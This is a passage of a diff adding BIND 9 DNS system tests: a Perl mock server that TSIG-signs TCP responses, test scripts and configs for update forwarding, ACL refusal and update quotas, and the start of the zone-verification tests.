idea how +# to sign multiple-message TCP responses. Several data that are included +# in the digest when signing a query or the first message of a response are +# omitted when signing subsequent messages in a TCP stream. +# +# Net::DNS::Packet->sign_tsig() has the ability to use a custom signing +# function (specified by calling Packet->sign_func()). We use this +# function as the signing function for TCP continuations, and it removes +# the unwanted data from the digest before calling the default sign_hmac +# function. +sub sign_tcp_continuation { + my ($key, $data) = @_; + + # copy out first two bytes: size of the previous MAC + my $rmacsize = unpack("n", $data); + $data = substr($data, 2); + + # copy out previous MAC + my $rmac = substr($data, 0, $rmacsize); + $data = substr($data, $rmacsize); + + # try parsing out the packet information + my $plen = packetlen($data); + my $pdata = substr($data, 0, $plen); + $data = substr($data, $plen); + + # remove the keyname, ttl, class, and algorithm name + $data = substr($data, namelen($data)); + $data = substr($data, 6); + $data = substr($data, namelen($data)); + + # preserve the TSIG data + my $tdata = substr($data, 0, 8); + + # prepare a new digest and sign with it + $data = pack("n", $rmacsize) . $rmac . $pdata . $tdata; + return Net::DNS::RR::TSIG::sign_hmac($key, $data); +} + +sub handleTCP { + my ($buf) = @_; + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + $packet->header->qr(1); + $packet->header->aa(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + my $signer; + while (my $rr = $packet->pop("additional")) { + if ($rr->type eq "TSIG") { + $prev_tsig = $rr; + } + } + + my @results = (); + my $count_these = 0; + + my $r; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + my($dbtype, $key_name, $key_data) = split(/ /,$pattern); + print "[handleTCP] $dbtype, $key_name, $key_data \n"; + if ("$qname $qtype" =~ /$dbtype/) { + $count_these++; + my $a; + foreach $a (@{$r->{answer}}) { + $packet->push("answer", $a); + } + if(defined($key_name) && defined($key_data)) { + # sign the packet + print " Signing the data with " . + "$key_name/$key_data\n"; + + my $tsig = Net::DNS::RR-> + new("$key_name TSIG $key_data"); + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. + $packet->{"compnames"} = {}; + $packet->{"header"}{"arcount"} += 1; + if (defined($prev_tsig)) { + my $rmac = pack('n H*', + $prev_tsig->mac_size, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } + + $tsig->sign_func($signer) if defined($signer); + $packet->sign_tsig($tsig); + $signer = \&sign_tcp_continuation; + + my $copy = + Net::DNS::Packet->new(\($packet->data)); + $prev_tsig = $copy->pop("additional"); + } + #$packet->print; + push(@results,$packet->data); + $packet = new Net::DNS::Packet(\$buf, 0); + $packet->header->qr(1); + $packet->header->aa(1); + } + } + print " A total of $count_these patterns matched\n"; + return \@results; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($tcpsock), 1) = 1; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($udpsock), 1)) { + printf "UDP request\n"; + my $buf; + $udpsock->recv($buf, 512); + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $conn = $tcpsock->accept; + my $buf; + for (;;) { + my $lenbuf; + my $n = $conn->sysread($lenbuf, 2); + last unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + } + sleep(1); + } +} diff --git a/bin/tests/system/upforwd/clean.sh b/bin/tests/system/upforwd/clean.sh new file mode 100644 index 0000000..14a7d29 --- /dev/null +++ b/bin/tests/system/upforwd/clean.sh @@ -0,0 +1,35 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after zone transfer tests. +# + +rm -f dig.out.ns1* dig.out.ns2 dig.out.ns1 dig.out.ns3 dig.out.ns1.after +rm -f ns1/*.jnl ns2/*.jnl ns3/*.jnl ns1/example.db ns2/*.bk ns3/*.bk +rm -f ns3/nomaster1.db +rm -f ns3/dnstap.out* +rm -f ns3/dnstap.conf +rm -f dnstap.out* +rm -f dnstapread.out* +rm -f */named.memstats +rm -f */named.run +rm -f */named.conf +rm -f */ans.run +rm -f Ksig0.example2.* +rm -f keyname keyname.err +rm -f ns*/named.lock +rm -f ns1/example2.db +rm -f ns*/managed-keys.bind* +rm -f nsupdate.out.* +rm -f ns*/named.run.prev diff --git a/bin/tests/system/upforwd/knowngood.after1 b/bin/tests/system/upforwd/knowngood.after1 new file mode 100644 index 0000000..7fc424c --- /dev/null +++ b/bin/tests/system/upforwd/knowngood.after1 @@ -0,0 +1,10 @@ +example. 3600 IN SOA n1.example. hostmaster.ns1.example. 2 3600 1200 604800 7200 +example. 3600 IN NS ns2.example. +example. 3600 IN NS ns3.example. +ns1.example. 3600 IN A 10.53.0.1 +ns2.example. 3600 IN A 10.53.0.2 +ns3.example. 3600 IN A 10.53.0.3 +updated.example. 600 IN TXT "Foo" +updated.example. 600 IN A 10.10.10.1 +example. 3600 IN SOA n1.example. hostmaster.ns1.example. 2 3600 1200 604800 7200 + diff --git a/bin/tests/system/upforwd/knowngood.after2 b/bin/tests/system/upforwd/knowngood.after2 new file mode 100644 index 0000000..eab7a2c --- /dev/null +++ b/bin/tests/system/upforwd/knowngood.after2 @@ -0,0 +1,11 @@ +example. 3600 IN SOA n1.example. hostmaster.ns1.example. 3 3600 1200 604800 7200 +example. 3600 IN NS ns2.example. +example. 3600 IN NS ns3.example. +ns1.example. 3600 IN A 10.53.0.1 +ns2.example. 3600 IN A 10.53.0.2 +ns3.example. 3600 IN A 10.53.0.3 +unsigned.example. 600 IN TXT "Foo" +unsigned.example. 600 IN A 10.10.10.1 +updated.example. 600 IN TXT "Foo" +updated.example. 600 IN A 10.10.10.1 +example. 3600 IN SOA n1.example. hostmaster.ns1.example. 3 3600 1200 604800 7200 diff --git a/bin/tests/system/upforwd/knowngood.before b/bin/tests/system/upforwd/knowngood.before new file mode 100644 index 0000000..4bde819 --- /dev/null +++ b/bin/tests/system/upforwd/knowngood.before @@ -0,0 +1,8 @@ +example. 3600 IN SOA n1.example. hostmaster.ns1.example. 1 3600 1200 604800 7200 +example. 3600 IN NS ns2.example. +example. 3600 IN NS ns3.example. +ns1.example. 3600 IN A 10.53.0.1 +ns2.example. 3600 IN A 10.53.0.2 +ns3.example. 3600 IN A 10.53.0.3 +example. 3600 IN SOA n1.example. hostmaster.ns1.example. 1 3600 1200 604800 7200 + diff --git a/bin/tests/system/upforwd/knowngood.ns2.before b/bin/tests/system/upforwd/knowngood.ns2.before new file mode 100644 index 0000000..bb3c355 --- /dev/null +++ b/bin/tests/system/upforwd/knowngood.ns2.before @@ -0,0 +1,6 @@ +example. 3600 IN SOA n1.example. hostmaster.ns1.example. 1 3600 1200 604800 7200 +example. 3600 IN NS ns2.example. +ns1.example. 3600 IN A 10.53.0.1 +ns2.example. 3600 IN A 10.53.0.2 +example. 3600 IN SOA n1.example. hostmaster.ns1.example. 1 3600 1200 604800 7200 + diff --git a/bin/tests/system/upforwd/ns1/example1.db b/bin/tests/system/upforwd/ns1/example1.db new file mode 100644 index 0000000..04c47f2 --- /dev/null +++ b/bin/tests/system/upforwd/ns1/example1.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 SOA n1.example. hostmaster.ns1.example. ( + 1 3600 1200 604800 7200 ) + NS ns2.example. + NS ns3.example. +ns1 A 10.53.0.1 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 diff --git a/bin/tests/system/upforwd/ns1/named.conf.in b/bin/tests/system/upforwd/ns1/named.conf.in new file mode 100644 index 0000000..c2b57dd --- /dev/null +++ b/bin/tests/system/upforwd/ns1/named.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key "update.example." { + algorithm "hmac-md5"; + secret "c3Ryb25nIGVub3VnaCBmb3IgYSBtYW4gYnV0IG1hZGUgZm9yIGEgd29tYW4K"; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +zone "example" { + type primary; + file "example.db"; + allow-update { key update.example.; 10.53.0.3; }; +}; + +zone "example2" { + type primary; + file "example2.db"; + allow-update { key sig0.example2.; }; +}; diff --git a/bin/tests/system/upforwd/ns2/named.conf.in b/bin/tests/system/upforwd/ns2/named.conf.in new file mode 100644 index 0000000..dd2de8b --- /dev/null +++ b/bin/tests/system/upforwd/ns2/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +zone "example" { + type secondary; + file "example.bk"; + primaries { 10.53.0.1; }; +}; + +zone "example2" { + type secondary; + file "example2.bk"; + primaries { 10.53.0.1; }; +}; diff --git a/bin/tests/system/upforwd/ns3/named1.conf.in b/bin/tests/system/upforwd/ns3/named1.conf.in new file mode 100644 index 0000000..61d42c8 --- /dev/null +++ b/bin/tests/system/upforwd/ns3/named1.conf.in @@ -0,0 +1,63 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + include "dnstap.conf"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "example" { + type secondary; + file "example.bk"; + allow-update-forwarding { 10.53.0.1; }; + primaries { 10.53.0.1; }; +}; + +zone "example2" { + type secondary; + file "example2.bk"; + allow-update-forwarding { 10.53.0.1; }; + primaries { 10.53.0.1; }; +}; + +zone "example3" { + type secondary; + file "example3.bk"; + allow-update-forwarding { 10.53.0.1; }; + primaries { 10.53.0.1; }; +}; + +zone "nomaster" { + type secondary; + file "nomaster1.db"; + allow-update-forwarding { any; }; + masterfile-format text; + primaries { 10.53.0.4; }; +}; diff --git a/bin/tests/system/upforwd/ns3/named2.conf.in b/bin/tests/system/upforwd/ns3/named2.conf.in new file mode 100644 index 0000000..86d7469 --- /dev/null +++ b/bin/tests/system/upforwd/ns3/named2.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + update-quota 1; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm @DEFAULT_HMAC@; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "example" { + type secondary; + file "example.bk"; + allow-update-forwarding { any; }; + primaries { 10.53.0.1; }; +}; diff --git a/bin/tests/system/upforwd/ns3/nomaster.db b/bin/tests/system/upforwd/ns3/nomaster.db new file mode 100644 index 0000000..c27e154 --- /dev/null +++ b/bin/tests/system/upforwd/ns3/nomaster.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA . . 141235 3600 1200 86400 1200 +@ 0 NS ns4 +ns4 0 A 10.53.0.4 diff --git a/bin/tests/system/upforwd/prereq.sh b/bin/tests/system/upforwd/prereq.sh new file mode 100644 index 0000000..ec369f8 --- /dev/null +++ b/bin/tests/system/upforwd/prereq.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi diff --git a/bin/tests/system/upforwd/setup.sh b/bin/tests/system/upforwd/setup.sh new file mode 100644 index 0000000..c7c9afc --- /dev/null +++ b/bin/tests/system/upforwd/setup.sh @@ -0,0 +1,48 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +cp -f ns1/example1.db ns1/example.db +cp -f ns3/nomaster.db ns3/nomaster1.db + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named1.conf.in ns3/named.conf + +if $FEATURETEST --enable-dnstap +then + cat <<'EOF' > ns3/dnstap.conf + dnstap-identity "ns3"; + dnstap-version "xxx"; + dnstap-output file "dnstap.out"; + dnstap { all; }; +EOF +else + echo "/* DNSTAP NOT ENABLED */" >ns3/dnstap.conf +fi + + +# +# SIG(0) required cryptographic support which may not be configured. +# +keyname=$($KEYGEN -q -n HOST -a ${DEFAULT_ALGORITHM} -b 1024 -T KEY sig0.example2 2>keyname.err) +if test -n "$keyname" +then + cat ns1/example1.db $keyname.key > ns1/example2.db + echo $keyname > keyname +else + cat ns1/example1.db > ns1/example2.db +fi +cat_i < keyname.err diff --git a/bin/tests/system/upforwd/tests.sh b/bin/tests/system/upforwd/tests.sh new file mode 100644 index 0000000..35c5588 --- /dev/null +++ b/bin/tests/system/upforwd/tests.sh @@ -0,0 +1,294 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# ns1 = stealth primary +# ns2 = secondary with update forwarding disabled; not currently used +# ns3 = secondary with update forwarding enabled + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +RNDCCMD="$RNDC -p ${CONTROLPORT} -c ../common/rndc.conf" + +status=0 +n=1 +capture_dnstap() { + retry_quiet 20 test -f ns3/dnstap.out && mv ns3/dnstap.out dnstap.out.$n + $RNDCCMD -s 10.53.0.3 dnstap -reopen +} + +uq_equals_ur() { + "$DNSTAPREAD" dnstap.out.$n | + awk '$3 == "UQ" { UQ+=1 } $3 == "UR" { UR += 1 } END { print UQ+0, UR+0 }' > dnstapread.out$n + read UQ UR < dnstapread.out$n + echo_i "UQ=$UQ UR=$UR" + test $UQ -eq $UR || return 1 +} + +echo_i "waiting for servers to be ready for testing ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG +tcp -p ${PORT} example. @10.53.0.1 soa > dig.out.ns1 || ret=1 + grep "status: NOERROR" dig.out.ns1 > /dev/null || ret=1 + $DIG +tcp -p ${PORT} example. @10.53.0.2 soa > dig.out.ns2 || ret=1 + grep "status: NOERROR" dig.out.ns2 > /dev/null || ret=1 + $DIG +tcp -p ${PORT} example. @10.53.0.3 soa > dig.out.ns3 || ret=1 + grep "status: NOERROR" dig.out.ns3 > /dev/null || ret=1 + test $ret = 0 && break + sleep 1 +done +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "fetching primary copy of zone before update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "fetching secondary 1 copy of zone before update ($n)" +$DIG $DIGOPTS example.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "fetching secondary 2 copy of zone before update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.3 axfr > dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "comparing pre-update copies to known good data ($n)" +ret=0 +digcomp knowngood.before dig.out.ns1 || ret=1 +digcomp knowngood.before dig.out.ns2 || ret=1 +digcomp knowngood.before dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "updating zone (signed) ($n)" +ret=0 +$NSUPDATE -y update.example:c3Ryb25nIGVub3VnaCBmb3IgYSBtYW4gYnV0IG1hZGUgZm9yIGEgd29tYW4K -- - <<EOF || ret=1 +local 10.53.0.1 +server 10.53.0.3 ${PORT} +update add updated.example. 600 A 10.10.10.1 +update add updated.example. 600 TXT Foo +send +EOF +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "sleeping 15 seconds for server to incorporate changes" +sleep 15 + +echo_i "fetching primary copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "fetching secondary 1 copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "fetching secondary 2 copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.3 axfr > dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "comparing post-update copies to known good data ($n)" +ret=0 +digcomp knowngood.after1 dig.out.ns1 || ret=1 +digcomp knowngood.after1 dig.out.ns2 || ret=1 +digcomp knowngood.after1 dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "checking 'forwarding update for zone' is logged ($n)" +ret=0 +grep "forwarding update for zone 'example/IN'" ns3/named.run > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +if $FEATURETEST --enable-dnstap +then + echo_i "checking DNSTAP logging of UPDATE forwarded update replies ($n)" + ret=0 + capture_dnstap + uq_equals_ur || ret=1 + if [ $ret != 0 ] ; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` +fi + +echo_i "updating zone (unsigned) ($n)" +ret=0 +$NSUPDATE -- - <<EOF || ret=1 +local 10.53.0.1 +server 10.53.0.3 ${PORT} +update add unsigned.example. 600 A 10.10.10.1 +update add unsigned.example. 600 TXT Foo +send +EOF +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "sleeping 15 seconds for server to incorporate changes" +sleep 15 + +echo_i "fetching primary copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "fetching secondary 1 copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "fetching secondary 2 copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.3 axfr > dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "comparing post-update copies to known good data ($n)" +ret=0 +digcomp knowngood.after2 dig.out.ns1 || ret=1 +digcomp knowngood.after2 dig.out.ns2 || ret=1 +digcomp knowngood.after2 dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +if $FEATURETEST --enable-dnstap +then + echo_i "checking DNSTAP logging of UPDATE forwarded update replies ($n)" + ret=0 + capture_dnstap + uq_equals_ur || ret=1 + if [ $ret != 0 ] ; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` +fi +n=`expr $n + 1` + +echo_i "checking update forwarding to dead primary ($n)" +count=0 +ret=0 +while [ $count -lt 5 -a $ret -eq 0 ] +do +( +$NSUPDATE -- - <<EOF +local 10.53.0.1 +server 10.53.0.3 ${PORT} +zone nomaster +update add unsigned.nomaster. 600 A 10.10.10.1 +update add unsigned.nomaster. 600 TXT Foo +send +EOF +) > /dev/null 2>&1 & + $DIG -p ${PORT} +noadd +notcp +noauth nomaster. @10.53.0.3 soa > dig.out.ns3 || ret=1 + grep "status: NOERROR" dig.out.ns3 > /dev/null || ret=1 + count=`expr $count + 1` +done +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +if $FEATURETEST --enable-dnstap +then + echo_i "checking DNSTAP logging of UPDATE forwarded update replies ($n)" + ret=0 + capture_dnstap + uq_equals_ur && ret=1 + if [ $ret != 0 ] ; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` +fi + +if test -f keyname +then + echo_i "checking update forwarding to with sig0 ($n)" + ret=0 + keyname=`cat keyname` + $NSUPDATE -k $keyname.private -- - <<EOF + local 10.53.0.1 + server 10.53.0.3 ${PORT} + zone example2 + update add unsigned.example2. 600 A 10.10.10.1 + update add unsigned.example2. 600 TXT Foo + send +EOF + $DIG -p ${PORT} unsigned.example2 A @10.53.0.1 > dig.out.ns1.test$n + grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 + if [ $ret != 0 ] ; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` + + if $FEATURETEST --enable-dnstap + then + echo_i "checking DNSTAP logging of UPDATE forwarded update replies ($n)" + ret=0 + capture_dnstap + uq_equals_ur || ret=1 + if [ $ret != 0 ] ; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` + fi +fi + +echo_i "attempting an update that should be rejected by ACL ($n)" +ret=0 +{ + $NSUPDATE -- - << EOF + local 10.53.0.2 + server 10.53.0.3 ${PORT} + update add another.unsigned.example. 600 A 10.10.10.2 + update add another.unsigned.example. 600 TXT Bar + send +EOF +} > nsupdate.out.$n 2>&1 +grep REFUSED nsupdate.out.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +n=$((n + 1)) +ret=0 +echo_i "attempting updates that should exceed quota ($n)" +# lower the update quota to 1. +copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 +nextpart ns3/named.run > /dev/null +for loop in 1 2 3 4 5 6 7 8 9 10; do +{ + $NSUPDATE -- - > /dev/null 2>&1 <<END + local 10.53.0.1 + server 10.53.0.3 ${PORT} + update add txt-$loop.unsigned.example 300 IN TXT Whatever + send +END +} & +done +wait_for_log 10 "too many DNS UPDATEs queued" ns3/named.run || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/verify/clean.sh b/bin/tests/system/verify/clean.sh new file mode 100644 index 0000000..767ca77 --- /dev/null +++ b/bin/tests/system/verify/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/named.lock +rm -f verify.out* +rm -f zones/*.bad +rm -f zones/*.good +rm -f zones/*.out* +rm -f zones/*.tmp +rm -f zones/K* +rm -f zones/dsset-* diff --git a/bin/tests/system/verify/setup.sh b/bin/tests/system/verify/setup.sh new file mode 100644 index 0000000..55022b9 --- /dev/null +++ b/bin/tests/system/verify/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +(cd zones && $SHELL genzones.sh) diff --git a/bin/tests/system/verify/tests.sh b/bin/tests/system/verify/tests.sh new file mode 100644 index 0000000..cda891a --- /dev/null +++ b/bin/tests/system/verify/tests.sh @@ -0,0 +1,112 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh +failed () { + cat verify.out.$n | sed 's/^/D:/'; + echo_i "failed"; + status=1; +} + +n=0 +status=0 + +for file in zones/*.good +do + n=`expr $n + 1` + zone=`expr "$file" : 'zones/\(.*\).good'` + echo_i "checking supposedly good zone: $zone ($n)" + ret=0 + case $zone in + zsk-only.*) only=-z;; + ksk-only.*) only=-z;; + *) only=;; + esac + $VERIFY ${only} -o $zone $file > verify.out.$n 2>&1 || ret=1 + [ $ret = 0 ] || failed +done + +for file in zones/*.bad +do + n=`expr $n + 1` + zone=`expr "$file" : 'zones/\(.*\).bad'` + echo_i "checking supposedly bad zone: $zone ($n)" + ret=0 + dumpit=0 + case $zone in + zsk-only.*) only=-z;; + ksk-only.*) only=-z;; + *) only=;; + esac + expect1= expect2= + case $zone in + *.dnskeyonly) + expect1="DNSKEY is not signed" + ;; + *.expired) + expect1="signature has expired" + expect2="No self-signed .*DNSKEY found" + ;; + *.ksk-expired) + expect1="signature has expired" + expect2="No self-signed .*DNSKEY found" + ;; + *.out-of-zone-nsec|*.below-bottom-of-zone-nsec|*.below-dname-nsec) + expect1="unexpected NSEC RRset at" + ;; + *.nsec.broken-chain) + expect1="Bad NSEC record for.*, next name mismatch" + ;; + *.bad-bitmap) + expect1="bit map mismatch" + ;; + *.missing-empty) + expect1="Missing NSEC3 record for"; + ;; 